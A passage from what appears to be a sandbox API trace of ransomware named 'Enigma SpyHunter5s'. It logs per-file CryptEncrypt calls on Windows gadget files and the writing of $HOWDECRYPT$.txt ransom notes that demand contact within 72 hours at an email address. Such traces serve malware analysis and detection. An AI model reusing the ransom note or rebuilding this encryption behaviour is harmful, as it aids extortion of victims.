nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x270e8a3*, lpNumberOfBytesWritten=0x270e9cc*=0x127, lpOverlapped=0x0) returned 1 [0160.845] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.845] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e9cc*=0x2ac, lpOverlapped=0x0) returned 1 [0160.845] CloseHandle (hObject=0x178) returned 1 [0160.845] GetProcessHeap () returned 0x2c0000 [0160.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89140 | out: hHeap=0x2c0000) returned 1 [0160.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e968 | out: pbBuffer=0x270e968) returned 1 [0160.845] GetProcessHeap () returned 0x2c0000 [0160.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e960*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e960*=0x30) returned 1 [0160.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\weather.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\weather.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.846] GetProcessHeap () returned 0x2c0000 [0160.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.846] GetProcessHeap () returned 0x2c0000 [0160.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ca38 | out: hHeap=0x2c0000) returned 1 [0160.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e968 | out: pbBuffer=0x270e968) returned 1 [0160.846] GetProcessHeap () returned 0x2c0000 [0160.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e960*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e960*=0x30) returned 1 [0160.846] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\settings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.846] GetProcessHeap () returned 0x2c0000 [0160.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.846] GetProcessHeap () returned 0x2c0000 [0160.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43928 | out: hHeap=0x2c0000) returned 1 [0160.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e960 | out: pbBuffer=0x270e960) returned 1 [0160.846] GetProcessHeap () returned 0x2c0000 [0160.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e958*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e958*=0x30) returned 1 [0160.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.847] GetProcessHeap () returned 0x2c0000 [0160.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.847] GetProcessHeap () returned 0x2c0000 [0160.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3dfc0 | out: hHeap=0x2c0000) returned 1 [0160.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e960 | out: pbBuffer=0x270e960) returned 1 [0160.847] GetProcessHeap () returned 0x2c0000 [0160.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e958*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e958*=0x30) returned 1 [0160.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.848] GetProcessHeap () returned 0x2c0000 [0160.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.848] GetProcessHeap () returned 0x2c0000 [0160.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2ef8 | out: hHeap=0x2c0000) returned 1 [0160.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.873] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.873] WriteFile (in: hFile=0x178, lpBuffer=0x270e88f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e9b8, lpOverlapped=0x0 | out: lpBuffer=0x270e88f*, lpNumberOfBytesWritten=0x270e9b8*=0x127, lpOverlapped=0x0) returned 1 [0160.874] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.874] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e9b8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e9b8*=0x2ac, lpOverlapped=0x0) returned 1 [0160.874] CloseHandle (hObject=0x178) returned 1 [0160.875] GetProcessHeap () returned 0x2c0000 [0160.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c940 | out: hHeap=0x2c0000) returned 1 [0160.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e958 | out: pbBuffer=0x270e958) returned 1 [0160.875] GetProcessHeap () returned 0x2c0000 [0160.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e950*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e950*=0x30) returned 1 [0160.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.876] GetProcessHeap () returned 0x2c0000 [0160.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.876] GetProcessHeap () returned 0x2c0000 [0160.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43728 | out: hHeap=0x2c0000) returned 1 [0160.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e950 | out: pbBuffer=0x270e950) returned 1 [0160.877] GetProcessHeap () returned 0x2c0000 [0160.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.877] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e948*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e948*=0x30) returned 1 [0160.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\reveal_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.878] GetProcessHeap () returned 0x2c0000 [0160.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.878] GetProcessHeap () returned 0x2c0000 [0160.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43528 | out: hHeap=0x2c0000) returned 1 [0160.878] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e950 | out: pbBuffer=0x270e950) returned 1 [0160.878] GetProcessHeap () returned 0x2c0000 [0160.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.878] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e948*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e948*=0x30) returned 1 [0160.878] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.879] GetProcessHeap () returned 0x2c0000 [0160.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.879] GetProcessHeap () returned 0x2c0000 [0160.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43428 | out: hHeap=0x2c0000) returned 1 [0160.879] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e948 | out: pbBuffer=0x270e948) returned 1 [0160.879] GetProcessHeap () returned 0x2c0000 [0160.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.879] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e940*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e940*=0x30) returned 1 [0160.879] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_hov.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.879] GetProcessHeap () returned 0x2c0000 [0160.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.880] GetProcessHeap () returned 0x2c0000 [0160.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c750 | out: hHeap=0x2c0000) returned 1 [0160.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e948 | out: pbBuffer=0x270e948) returned 1 [0160.880] GetProcessHeap () returned 0x2c0000 [0160.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e940*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e940*=0x30) returned 1 [0160.880] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\prev_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\prev_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.888] GetProcessHeap () returned 0x2c0000 [0160.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.888] GetProcessHeap () returned 0x2c0000 [0160.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43328 | out: hHeap=0x2c0000) returned 1 [0160.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e940 | out: pbBuffer=0x270e940) returned 1 [0160.889] GetProcessHeap () returned 0x2c0000 [0160.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e938*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e938*=0x30) returned 1 [0160.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.890] GetProcessHeap () returned 0x2c0000 [0160.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.890] GetProcessHeap () returned 0x2c0000 [0160.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43028 | out: hHeap=0x2c0000) returned 1 [0160.890] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e940 | out: pbBuffer=0x270e940) returned 1 [0160.890] GetProcessHeap () returned 0x2c0000 [0160.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.890] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e938*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e938*=0x30) returned 1 [0160.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_hov.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_hov.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.890] GetProcessHeap () returned 0x2c0000 [0160.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.890] GetProcessHeap () returned 0x2c0000 [0160.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f42f28 | out: hHeap=0x2c0000) returned 1 [0160.891] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e938 | out: pbBuffer=0x270e938) returned 1 [0160.891] GetProcessHeap () returned 0x2c0000 [0160.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.891] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e930*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e930*=0x30) returned 1 [0160.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\pause_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\pause_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.899] GetProcessHeap () returned 0x2c0000 [0160.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.899] GetProcessHeap () returned 0x2c0000 [0160.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f42e28 | out: hHeap=0x2c0000) returned 1 [0160.899] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e938 | out: pbBuffer=0x270e938) returned 1 [0160.899] GetProcessHeap () returned 0x2c0000 [0160.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.900] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e930*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e930*=0x30) returned 1 [0160.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\slideshow_glass_frame.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.912] GetProcessHeap () returned 0x2c0000 [0160.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.912] GetProcessHeap () returned 0x2c0000 [0160.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83698 | out: hHeap=0x2c0000) returned 1 [0160.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.946] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.946] WriteFile (in: hFile=0x178, lpBuffer=0x270e867*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e990, lpOverlapped=0x0 | out: lpBuffer=0x270e867*, lpNumberOfBytesWritten=0x270e990*=0x127, lpOverlapped=0x0) returned 1 [0160.947] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.947] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e990, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e990*=0x2ac, lpOverlapped=0x0) returned 1 [0160.947] CloseHandle (hObject=0x178) returned 1 [0160.947] GetProcessHeap () returned 0x2c0000 [0160.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb18b8 | out: hHeap=0x2c0000) returned 1 [0160.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.988] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.988] WriteFile (in: hFile=0x178, lpBuffer=0x270e863*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e98c, lpOverlapped=0x0 | out: lpBuffer=0x270e863*, lpNumberOfBytesWritten=0x270e98c*=0x127, lpOverlapped=0x0) returned 1 [0160.989] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.989] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e98c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e98c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.990] CloseHandle (hObject=0x178) returned 1 [0160.990] GetProcessHeap () returned 0x2c0000 [0160.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb13b8 | out: hHeap=0x2c0000) returned 1 [0160.990] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e928 | out: pbBuffer=0x270e928) returned 1 [0160.990] GetProcessHeap () returned 0x2c0000 [0160.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.990] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e920*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e920*=0x30) returned 1 [0160.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows 